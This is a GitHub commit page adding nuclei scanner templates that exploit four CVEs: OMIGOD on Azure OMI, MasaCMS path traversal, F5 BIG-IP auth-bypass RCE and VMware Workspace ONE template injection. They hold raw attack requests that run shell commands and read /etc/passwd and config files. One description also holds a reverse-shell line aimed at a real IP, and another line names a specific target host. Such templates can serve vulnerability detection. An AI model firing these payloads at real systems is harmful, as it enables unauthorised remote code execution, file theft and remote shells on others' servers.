-
Notifications
You must be signed in to change notification settings - Fork 653
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
31 changed files
with
2,014 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
id: CVE-2021-38647_51pwn | ||
|
||
info: | ||
name: OMIGOD – RCE Vulnerability in Multiple Azure Linux Deployments CVE-2021-38647 | ||
author: 51pwn | ||
severity: Critical | ||
description: | | ||
On September 14, multiple vulnerabilities were discovered by researchers at Wiz.io. | ||
The most critical of them being CVE-2021-38647, now dubbed OMIGOD, | ||
which effects the Open Management Infrastructure (OMI) agent in versions 1.6.8.0 and below. | ||
reference: | ||
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/ | ||
|
||
tags: RCE,Web | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /wsman HTTP/1.1 | ||
Connection: close | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 | ||
Host: {{Hostname}} | ||
Content-Type: application/soap+xml;charset=UTF-8 | ||
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema"> | ||
<s:Header> | ||
<a:To>HTTP://192.168.1.1:5986/wsman/</a:To> | ||
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI> | ||
<a:ReplyTo> | ||
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address> | ||
</a:ReplyTo> | ||
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand</a:Action> | ||
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize> | ||
<a:MessageID>uuid:0AB58087-C2C3-0005-0000-000000010000</a:MessageID> | ||
<w:OperationTimeout>PT1M30S</w:OperationTimeout> | ||
<w:Locale xml:lang="en-us" s:mustUnderstand="false" /> | ||
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false" /> | ||
<w:OptionSet s:mustUnderstand="true" /> | ||
<w:SelectorSet> | ||
<w:Selector Name="__cimnamespace">root/scx</w:Selector> | ||
</w:SelectorSet> | ||
</s:Header> | ||
<s:Body> | ||
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"> | ||
<p:command>id</p:command> | ||
<p:timeout>0</p:timeout> | ||
</p:ExecuteShellCommand_INPUT> | ||
</s:Body> | ||
</s:Envelope> | ||
# end | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- <p:StdOut>(.*uid=.*)<\/p:StdOut> | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
id: CVE-2021-42183_51pwn | ||
info: | ||
name: MasaCMS 7.2.1 is affected by a path traversal vulnerability in /index.cfm/_api/asset/image/. | ||
author: 51pwn | ||
severity: critical | ||
reference: | ||
- https://github.com/hktalent/nuclei-templates | ||
- https://51pwn.com | ||
tags: oss | ||
|
||
requests: | ||
- raw: | ||
- |+ | ||
GET /_api/asset/image/?filePath=/../config/settings.ini.cfm HTTP/1.1 | ||
Host: {{Hostname}} | ||
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 | ||
Pragma:no-cache | ||
unsafe: true | ||
cookie-reuse: true | ||
req-condition: true | ||
|
||
matchers-condition: or | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "status_code_1 == 200" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
id: CVE-2022-1388_51pwn | ||
|
||
info: | ||
name: F5 BIG-IP iControl REST Auth Bypass RCE | ||
author: dwisiswant0 | ||
severity: critical | ||
description: | | ||
doNuclei https://181.188.0.131 ~/MyWork/mybugbounty/yaml/CVE-2022-1388.yaml | ||
This vulnerability may allow an unauthenticated attacker | ||
with network access to the BIG-IP system through the management | ||
port and/or self IP addresses to execute arbitrary system commands, | ||
create or delete files, or disable services. There is no data plane | ||
exposure; this is a control plane issue only. # "utilCmdArgs": "-c 'bash -i >& /dev/tcp/107.182.191.202/1234 0>&1' " | ||
reference: | ||
- https://twitter.com/GossiTheDog/status/1523566937414193153 | ||
- https://support.f5.com/csp/article/K23605346 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.80 | ||
cve-id: CVE-2022-1388 | ||
cwe-id: CWE-306 | ||
metadata: | ||
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" | ||
verified: true | ||
tags: bigip,cve,cve2022,rce,mirai | ||
|
||
variables: | ||
auth: "admin:" | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /mgmt/tm/util/bash HTTP/1.1 | ||
Host: {{Hostname}} | ||
Connection: Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host | ||
X-F5-Auth-Token: a | ||
Authorization: Basic {{base64(auth)}} | ||
Content-Type: application/json | ||
{ | ||
"command": "run", | ||
"utilCmdArgs": "-c id" | ||
} | ||
matchers-condition: and | ||
matchers: | ||
- type: regex | ||
regex: | ||
- "(commandResult)" | ||
- "(uid=\\d+\\(.*)" | ||
- type: status | ||
status: | ||
- 200 | ||
condition: and | ||
extractors: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "(uid=\\d+\\([^\\n]{3,})" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2022-22954_51pwn | ||
|
||
info: | ||
name: VMware Workspace ONE Access - Server-Side Template Injection | ||
author: 51pwn | ||
severity: critical | ||
description: | | ||
VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. | ||
reference: | ||
- https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011 | ||
- https://www.vmware.com/security/advisories/VMSA-2022-0011.html | ||
- http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html | ||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22954 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2022-22954 | ||
cwe-id: CWE-94 | ||
metadata: | ||
shodan-query: http.favicon.hash:-1250474341 | ||
tags: cve,cve2022,vmware,ssti,workspaceone,cisa | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
# - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}" # Executes cat /etc/passwd | ||
- "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d" # Executes cat /etc/passwd | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "root:*:0:0:" | ||
|
||
|
||
# Enhanced by mp on 2022/07/06 |
Oops, something went wrong.